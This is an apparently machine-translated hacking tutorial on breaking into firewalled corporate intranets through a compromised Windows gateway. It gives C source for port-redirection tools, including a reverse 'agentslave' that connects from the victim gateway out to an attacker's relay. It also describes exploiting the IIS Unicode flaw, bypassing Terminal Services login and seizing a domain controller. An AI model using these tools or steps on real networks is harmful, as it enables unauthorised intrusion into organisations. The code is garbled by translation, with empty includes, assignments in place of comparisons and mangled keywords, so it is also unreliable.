How to break through the TCP-IP filter firewall into the Intranet)

Nowadays, many enterprises or companies basically apply for a connection to the Internet, such as broadband, DDN, ADSL, and ISDN, and then use one server as the gateway and two network adapters of the server, one is to connect to the Internet, the other is to connect to the Intranet hub or switch, and then other machines in the Intranet can connect to the Internet through the gateway.
Some may think like this: I am in the intranet and there is no direct connection between us. You cannot attack me. This is not the case. machines on the Intranet may also be attacked from the Internet. Of course, the premise is that the attacker has obtained some permissions on the gateway server? In fact, many gateway servers on the Internet are not strictly configured for security, and obtaining permissions is not as difficult as you think.
OK! If you don't talk nonsense, let's get started with the topic. Our goal is to use our termclient [M $ terminal service client] to connect to the termserver machine on the enemy's intranet. M $ Terminal Service is a good remote management tool, isn't it? Haha. Unless otherwise specified, the Server OS mentioned in this article is Windows
2000. If the server is Linux or other, the principle is similar. Just change the program slightly.
<Part 1: use TCP socket to forward data to an intranet without firewall protection>
Assume that the network topology of the enemy is shown in. No firewall is installed or TCP/IP restrictions are imposed on the gateway server.
Our goal is to connect the terminal of the enemy's intranet.
Server [192.168.1.3], because there is no way to directly establish a connection with the gateway server, it is only necessary to first get up and down from its gateway server. Assume that the enemy gateway server is M $ windows
2 K, IIS has Unicode vulnerability [it is too easy to find some machines with the vulnerability, but I just scripts
Kid, only use the existing vulnerabilities to do some simple attacks: (555), then we get a gateway shell, where we can run our program, although the permission is very low, but you can also do a lot of things. OK! Let's write a TCP
The socket data forwarding applet allows the enemy's gateway server to faithfully forward data between [202.1.1.1] And the termserver [192.168.1.3] on the enemy's intranet. Problem: the actual intrusion process is to first obtain the permissions of the gateway server, and then use it as a stepping stone to further understand its internal network topology and perform further intrusion, now we have designed the network topology of the enemy, haha.
The attack process is as follows:
<1> On the gateway server 202.2.2.2, run our program agentgateway, which listens to TCP
Port 3389 [changed to something else, so we need to modify termclient accordingly] waiting for us to connect.
<2> we connect 202.1.1.1 to 202.2.2.2: 3389 with termclient.
<3> 202.2.2.2. Accept the connection of 202.1.1.1, and then establish a TCP
Connect the socket to the termserver on your intranet [192.168.1.3]
<4> in this way, the data channel between us and the termserver on the enemy's intranet is ready, and the gateway will faithfully forward data for us. When we connect to 202.2.2.2: 3389, the actual interface is 192.168.1.3 of the enemy's intranet. How do we feel? :)
The program code is as follows:
/*************************************** *******************************
Module name: agentgateway. c
Date: 2001/4/15
Copyright (c) eyas
Note: The port redirection tool runs on the gateway and redirects the port to the Intranet IP address and port,
You can access the Intranet.
Sock [0] ==> sclient sock [1] ==> starget
**************************************** ******************************/
# Include
# Include
# Include "tcpdataredird. c"
# Define targetip text ("192.168.1.3 ")
# Define targetport (INT) 3389
# Define listenport (INT) 3389 // listening port
# Pragma comment (Lib, "ws2_32.lib ")
Int main ()
{
Wsadata WSD;
Socket slisten = invalid_socket, // socket monitored by the Local Machine
Sock [2];
Struct sockaddr_in local, client, target;
Int iaddrsize;
Handle hthreadc2t = NULL, // c2t = clienttotarget
Hthreadt2c = NULL; // t2c = targettoclient
DWORD dwthreadid;
_ Try
{
If (wsastartup (makeword (2, 2), & WSD )! = 0)
{
Printf ("/nwsastartup () failed: % d", getlasterror ());
_ Leave;
}
Slisten = socket (af_inet, sock_stream, ipproto_ip );
If (slisten = invalid_socket)
{
Printf ("/nsocket () failed: % d", getlasterror ());
_ Leave;
}
Local. sin_addr.s_addr = htonl (inaddr_any );
Local. sin_family = af_inet;
Local. sin_port = htons (listenport );

Target. sin_family = af_inet;
Target. sin_addr.s_addr = inet_addr (targetip );
Target. sin_port = htons (targetport );

If (BIND (slisten, (struct sockaddr
*) & Local, sizeof (local) = socket_error)
{
Printf ("/nbind () failed: % d", getlasterror ());
_ Leave;
}
If (Listen (slisten, 1) = socket_error)
{
Printf ("/nlisten () failed: % d", getlasterror ());
_ Leave;
}
// Scoket Loop
While (1)
{
Printf ("/n ************** waiting client connect
To **************/n ");
Iaddrsize = sizeof (client );
// Get socket sclient
Sock [0] = accept (slisten, (struct sockaddr *) & client, & iaddrsize );
If (sock [0] = invalid_socket)
{
Printf ("/naccept () failed: % d", getlasterror ());
Break;
}
Printf ("/naccept client ==> % s: % d", inet_ntoa (client. sin_addr ),
Ntohs (client. sin_port ));
// Create socket starget
Sock [1] = socket (af_inet, sock_stream, ipproto_ip );
If (sock [1] = invalid_socket)
{
Printf ("/nsocket () failed: % d", getlasterror ());
_ Leave;
}
// Connect to target port
If (connect (sock [1], (struct sockaddr
*) & Target, sizeof (target) = socket_error)
{
Printf ("/nconnect () failed: % d", getlasterror ());
_ Leave;
}
Printf ("/nconnect to target 3389 success! ");
// Create two threads for data forwarding
Hthreadc2t = createthread (null, 0, tcpdatac2t, (lpvoid) sock, 0, & dwthreadid );
Hthreadt2c = createthread (null, 0, tcpdatat2c, (lpvoid) sock, 0, & dwthreadid );
// Wait for two threads to end
Waitforsingleobject (hthreadc2t, infinite );
Waitforsingleobject (hthreadt2c, infinite );
Closehandle (hthreadc2t );
Closehandle (hthreadt2c );
Closesocket (sock [1]);
Closesocket (sock [0]);
Printf ("/n ******************* connection
Close *******************/n ");
} // End of sock External Loop
} // End of try
_ Finally
{
If (slisten! = Invalid_socket) closesocket (slisten );
If (sock [0]! = Invalid_socket) closesocket (sock [0]);
If (sock [1]! = Invalid_socket) closesocket (sock [1]);
If (hthreadc2t! = NULL) closehandle (hthreadc2t );
If (hthreadt2c! = NULL) closehandle (hthreadt2c );
Wsacleanup ();
}
Return 0;
}
/*************************************** **********************************
Module: tcpdataredird. c
Date: 2001/4/16
Copyright (c) eyas
Homepage: www.patching.net
Thanks to shotgun
Note: For TCP socket data forwarding, sock [0] ==> sclient sock [1] ==> starget
**************************************** *********************************/
# Define buffsize 20*1024 // buffer size 20 K
// This function reads data from the client and forwards the data to the target
DWORD winapi tcpdatac2t (socket * sock)
{
Int iret,
Ret =-1, // return value of select
Ileft,
Idx,
Isttbcs = 0; // sttbcs = sendtotargetbuffcurrentsize
Char szsendtotargetbuff [buffsize] =,
Szrecvfromclientbuff [buffsize] =;
Fd_set fdread, fdwrite;
Printf ("/n ******************* connection
Active *******************/n ");
While (1)
{
Fd_zero (& fdread );
Fd_zero (& fdwrite );
Fd_set (sock [0], & fdread );
Fd_set (sock [1], & fdwrite );
If (ret = select (0, & fdread, & fdwrite, null, null) = socket_error)
{
Printf ("/nselect () failed: % d", getlasterror ());
Break;
}
// Printf ("/nselect () Return Value ret = % d", RET );
If (Ret> 0)
{
// Sclinet readable. The client has data to send.
If (fd_isset (sock [0], & fdread ))
{
// Receives data sent from sock [0]
Iret = Recv (sock [0], szrecvfromclientbuff, buffsize, 0 );
If (iret = socket_error)
{
Printf ("/nrecv () from sock [0] failed: % d", getlasterror ());
Break;
}
Else if (iret = 0)
Break;
Printf ("/nrecv % d bytes from sclinet.", iret );
// Add the data received from the client to the buffer to be sent to the target.
Memcpy (szsendtotargetbuff + isttbcs, szrecvfromclientbuff, iret );
// Refresh the current buff size of the data buffer sent to the target
Isttbcs + = iret;
// Clear the buffer for receiving client data
Memset (szrecvfromclientbuff, 0, buffsize );
}
// Starget can be written to send the data received from the client to the target
If (fd_isset (sock [1], & fdwrite ))
{
// Forward data to port 3389 of target
Ileft = isttbcs;
Idx = 0;
While (ileft> 0)
{
Iret = Send (sock [1], & szsendtotargetbuff [idx], ileft, 0 );
If (iret = socket_error)
{
Printf ("/nsend () to target failed: % d", getlasterror ());
Break;
}
Printf ("/nsend % d bytes to target", iret );
Ileft-= iret;
Idx + = iret;
}
// Clear the buffer
Memset (szsendtotargetbuff, 0, buffsize );
// Reset the current buff size of the data buffer sent to the target
Isttbcs = 0;
}
} // End of select RET
Sleep (1 );
} // End of Data send & Recv Loop
Return 0;
}
// This function reads data from the target and sends it to the client.
DWORD winapi tcpdatat2c (socket * sock)
{
Int iret,
Ret =-1, // return value of select
Ileft,
Idx,
Istcbcs = 0; // stcbcs = sendtoclientbuffcurrentsize
Char szrecvfromtargetbuff [buffsize] =,
Szsendtoclientbuff [buffsize] =;
Fd_set fdread, fdwrite;

While (1)
{
Fd_zero (& fdread );
Fd_zero (& fdwrite );
Fd_set (sock [0], & fdwrite );
Fd_set (sock [1], & fdread );
If (ret = select (0, & fdread, & fdwrite, null, null) = socket_error)
{
Printf ("/nselect () failed: % d", getlasterror ());
Break;
}
If (Ret> 0)
{
// Read starget and receive data from target
If (fd_isset (sock [1], & fdread ))
{
// Receives the data returned by the target.
Iret = Recv (sock [1], szrecvfromtargetbuff, buffsize, 0 );
If (iret = socket_error)
{
Printf ("/nrecv () from target failed: % d", getlasterror ());
Break;
}
Else if (iret = 0)
Break;
Printf ("/nrecv % d bytes from target", iret );
// Add the data received from the target to the buffer sent to the client
Memcpy (szsendtoclientbuff + istcbcs, szrecvfromtargetbuff, iret );
// Clear the data buffer returned by the receiving target
Memset (szrecvfromtargetbuff, 0, buffsize );
// Refresh the current size of the data buffer sent to the client
Istcbcs + = iret;
}
// The client can write and send the target returned data to the client.
If (fd_isset (sock [0], & fdwrite ))
{
// Send the target response data to the client
Ileft = istcbcs;
Idx = 0;
While (ileft> 0)
{
Iret = Send (sock [0], & szsendtoclientbuff [idx], ileft, 0 );
If (iret = socket_error)
{
Printf ("/nsend () to client failed: % d", getlasterror ());
Break;
}
Printf ("/nsend % d bytes to client", iret );
Ileft-= iret;
Idx + = iret;
}
// Clear the buffer
Memset (szsendtoclientbuff, 0, buffsize );
Istcbcs = 0;
}
} // End of select RET
Sleep (1 );
} // End of while
Return 0;
}
(Use TCP socket to forward and rebound TCP ports to access the firewall-protected Intranet)
In fact, many intranets are not as simple as the first part. Let's take a look at a firewall-protected Intranet, provided that the firewall has no restrictions on the TCP port rebound. Assume that the network topology is as follows:
The above network topology is what I encountered when I authorized my friends to intrude into the company's website.
<1> I am in 192.168.0.2 of the company's intranet and access the Internet through the company's gateway 202.1.1.1, but I am the admin of the gateway :).
<2> the enemy's [actually friend] Gateway OS is 2 k adv
Server, with TCP/IP restrictions on the Internet Nic, only the TCP ports 25, 53, 80,110,330 6 are enabled.
Port, through a vulnerability, I got a shell that can execute system commands through IE, although the permission is low. The Gateway has terminal services. The logon verification vulnerability patch is not installed, but the input method help file has been deleted. However, we can use shell to upload the input method help file, because his system permissions are not properly set, we can write. In this way, as long as we can connect to the terminal service, we can bypass login verification and get the admin permission. How to connect? There is a way to use TCP
Socket forwarding. Is it the same as the first part? Some differences. Because he has made TCP/IP restrictions, we can't connect to him. We can only let him connect to us, TCP rebound port, huh, huh.
The attack process is as follows:
<1> RUN agentmaster on my server 202.1.1.1 and listen to TCP port
12345. Wait for 202.2.2.2 to connect, listen to TCP port 3389, and wait for my 192.168.0.2 connection.
<2> RUN agentslave on the enemy gateway machine 202.2.2.2 and connect to the TCP port 202.1.1.1
12345 [Note: the port is a bounce port, and TCP/IP filtering is not feasible]
<3> I use termclient to connect to my server 192.168.0.2 202.1.1.1: 3389
<4> connect the agentslave on the enemy gateway to its own intranet IP address ==>192.168.1.1: 3389
<5> data channels should be established. The two proxies faithfully forward data for us. When we connect to 3389 of our servers, we actually come out of a machine on the enemy's intranet.
Later, it was found that the enemy's primary domain controller was 192.168.1.4. Through the connection established with his gateway, he easily obtained the admin permission of the primary domain by using a vulnerability. He may think that the primary domain is in the Intranet, and the gateway performs TCP/IP filtering again. Attackers cannot access the gateway. I just need to set agentslave to connect 192.168.1.4: 3389, and then I can directly connect to his main domain controller, but the same is true for logging on to the gateway.
The program code is as follows [the tcpdataredird. c used in the program has been pasted in the first part. The file is used for data forwarding, which is common:
/*************************************** ***************************************
Module name: agentmaster. c
Date: 2001/4/16
Copyright (c) eyas
Note: The scoket proxy host monitors two TCP sockets and waits for the attacker to connect to agentslave.
After scoket is connected successfully, data forwarding starts.
Sock [0] is client => sock [0] sock [1] is target => sock [1]
**************************************** **************************************/
# Include <stdio. h> 〉
# Include <winsock2.h> 〉
# Include "tcpdataredird. c"
# Pragma comment (Lib, "ws2_32.lib ")
# Define targetport 3389 // The disguised target listening port
# Define localport 12345 // wait for the port from agentslave to connect
Int main ()
{
Wsadata WSD;
Socket s3389 = invalid_socket, // socket monitored by the local machine, waiting for the attacker to connect
S1981 = invalid_socket, // listener socket, waiting for agentslave to connect
Sock [2] =;
Struct sockaddr_in local3389, local1981, attack, slave;
Int iaddrsize;
Handle hthreadc2t = NULL, // c2t = clienttotarget
Hthreadt2c = NULL; // t2c = targettoclient
DWORD dwthreadid;
_ Try
{
// Load Winsock Library
If (wsastartup (makeword (2, 2), & WSD )! = 0)
{
Printf ("/nwsastartup () failed: % d", getlasterror ());
_ Leave;
}
// Create socket
S3389 = socket (af_inet, sock_stream, ipproto_ip );
If (s3389 = invalid_socket)
{
Printf ("/nsocket () failed: % d", getlasterror ());
_ Leave;
}
// Create socket
S1981 = socket (af_inet, sock_stream, ipproto_ip );
If (s1981 = invalid_socket)
{
Printf ("/nsocket () failed: % d", getlasterror ());
_ Leave;
}
// Fill the struct
Local3389.sin _ ADDR. s_addr = htonl (inaddr_any );
Local3389.sin _ family = af_inet;
Local3389.sin _ Port = htons (targetport );
Local1981.sin _ ADDR. s_addr = htonl (inaddr_any );
Local1981.sin _ family = af_inet;
Local1981.sin _ Port = htons (localport );
// Bind s3389 for Attacker
If (BIND (s3389, (struct sockaddr
*) & Local3389, sizeof (local3389) = socket_error)
{
Printf ("/nbind () failed: % d", getlasterror ());
_ Leave;
}
// Listen for attacker to connect
If (Listen (s3389, 1) = socket_error)
{
Printf ("/nlisten () failed: % d", getlasterror ());
_ Leave;
}
// Bind s1981 for agentslave
If (BIND (s1981, (struct sockaddr
*) & Local1981, sizeof (local1981) = socket_error)
{
Printf ("/nbind () failed: % d", getlasterror ());
_ Leave;
}
// Listen for agentslave to connect
If (Listen (s1981, 1) = socket_error)
{
Printf ("/nlisten () failed: % d", getlasterror ());
_ Leave;
}
// Socket Loop
While (1)
{
// Wait for agentslave to connect
Iaddrsize = sizeof (slave );
Sock [1] = accept (s1981, (struct sockaddr *) & slave, & iaddrsize );
If (sock [1] = invalid_socket)
{
Printf ("/naccept () failed: % d", getlasterror ());
Break;
}
Printf ("/naccept agentslave ==>% S: % d", inet_ntoa (slave. sin_addr ),
Ntohs (slave. sin_port ));
// Wait for attacker to connect
Iaddrsize = sizeof (attack );
Sock [0] = accept (s3389, (struct sockaddr *) & attack, & iaddrsize );
If (sock [0] = invalid_socket)
{
Printf ("/naccept () failed: % d", getlasterror ());
Break;
}
Printf ("/naccept attacker ==>% S: % d", inet_ntoa (attack. sin_addr ),
Ntohs (attack. sin_port ));
// Create two threads for data forwarding
Hthreadc2t = createthread (null, 0, tcpdatac2t, (lpvoid) sock, 0, & dwthreadid );
Hthreadt2c = createthread (null, 0, tcpdatat2c, (lpvoid) sock, 0, & dwthreadid );
// Wait for two threads to end
Waitforsingleobject (hthreadc2t, infinite );
Closehandle (hthreadc2t );
Closehandle (hthreadt2c );
Closesocket (sock [0]);
Closesocket (sock [1]);
} // End of socket while
} // End of try
_ Finally
{
// Clean all
If (s3389! = Invalid_socket) closesocket (s3389 );
If (s1981! = Invalid_socket) closesocket (s1981 );
If (sock [0]! = Invalid_socket) closesocket (sock [0]);
If (sock [1]! = Invalid_socket) closesocket (sock [1]);
If (hthreadc2t! = NULL) closehandle (hthreadc2t );
If (hthreadt2c! = NULL) closehandle (hthreadt2c );
Wsacleanup ();
}
Return 0;
}
/*************************************** **************************************** ****
Module: agentslave. c
Date: 2001/4/17
Copyright (c) eyas
Homepage: www.patching.net
Note: This program is responsible for connecting to the final target, connecting to the master end, and then forwarding data.
The socket connecting to agenrmaster is equivalent to sclient ==> sock [0],
The socoket connected to the final target is starget ==> sock [1].
**************************************** **************************************** ***/
# Include <stdio. h> 〉
# Include <winsock2.h> 〉
# Include "tcpdataredird. c"
# Pragma comment (Lib, "ws2_32.lib ")
# Define targetip "192.168.1.3"
# Define targetport (INT) 3389
# Define agentmasterip "202.1.1.1"
# Define agentmasterport (INT) 12345
Int main ()
{
Wsadata WSD;
Socket sock [2] =;
Struct sockaddr_in master, target;
Handle hthreadc2t = NULL, // c2t = clienttotarget
Hthreadt2c = NULL; // t2c = targettoclient
DWORD dwthreadid;
_ Try
{
// Load Winsock Library
If (wsastartup (makeword (2, 2), & WSD )! = 0)
{
Printf ("/nwsastartup () failed: % d", getlasterror ());
_ Leave;
}
// Loop
While (1)
{
// Create client socket
Sock [0] = socket (af_inet, sock_stream, ipproto_ip );
If (sock [0] = invalid_socket)
{
Printf ("/nsocket () failed: % d", getlasterror ());
_ Leave;
}
// Create target socket
Sock [1] = socket (af_inet, sock_stream, ipproto_ip );
If (sock [1] = invalid_socket)
{
Printf ("/nsocket () failed: % d", getlasterror ());
_ Leave;
}
// Fill struct
Target. sin_family = af_inet;
Target. sin_addr.s_addr = inet_addr (targetip );
Target. sin_port = htons (targetport );
Master. sin_family = af_inet;
Master. sin_addr.s_addr = inet_addr (agentmasterip );
Master. sin_port = htons (agentmasterport );
// Connect to agentmaster
If (connect (sock [0], (struct sockaddr
*) & Master, sizeof (master) = socket_error)
{
// Wait for a while after the connection fails
Printf ("/nconnect () to master failed: % d", getlasterror ());
Closesocket (sock [0]);
Closesocket (sock [1]);
Sleep (5000 );
Continue;
}
Printf ("/nconnect to % S % d success! ", Agentmasterip, agentmasterport );
// Connect to target
If (connect (sock [1], (struct sockaddr
*) & Target, sizeof (target) = socket_error)
{
Printf ("/nconnect () to target failed: % d", getlasterror ());
_ Leave;
}
Printf ("/nconnect to % S % d success! ", Targetip, targetport );
// Create two threads for data forwarding
Hthreadc2t = createthread (null, 0, tcpdatac2t, (lpvoid) sock, 0, & dwthreadid );
Hthreadt2c = createthread (null, 0, tcpdatat2c, (lpvoid) sock, 0, & dwthreadid );
// Wait for two threads to end
Waitforsingleobject (hthreadc2t, infinite );
Closehandle (hthreadc2t );
Closehandle (hthreadt2c );
Closesocket (sock [0]);
Closesocket (sock [1]);
} // End of while
} // End of try
_ Finally
{
If (sock [0]! = Invalid_socket) closesocket (sock [0]);
If (sock [1]! = Invalid_socket) closesocket (sock [1]);
If (hthreadc2t! = NULL) closehandle (hthreadc2t );
If (hthreadt2c! = NULL) closehandle (hthreadt2c );
Wsacleanup ();
}
Return 0;
}

Okay, now it's over.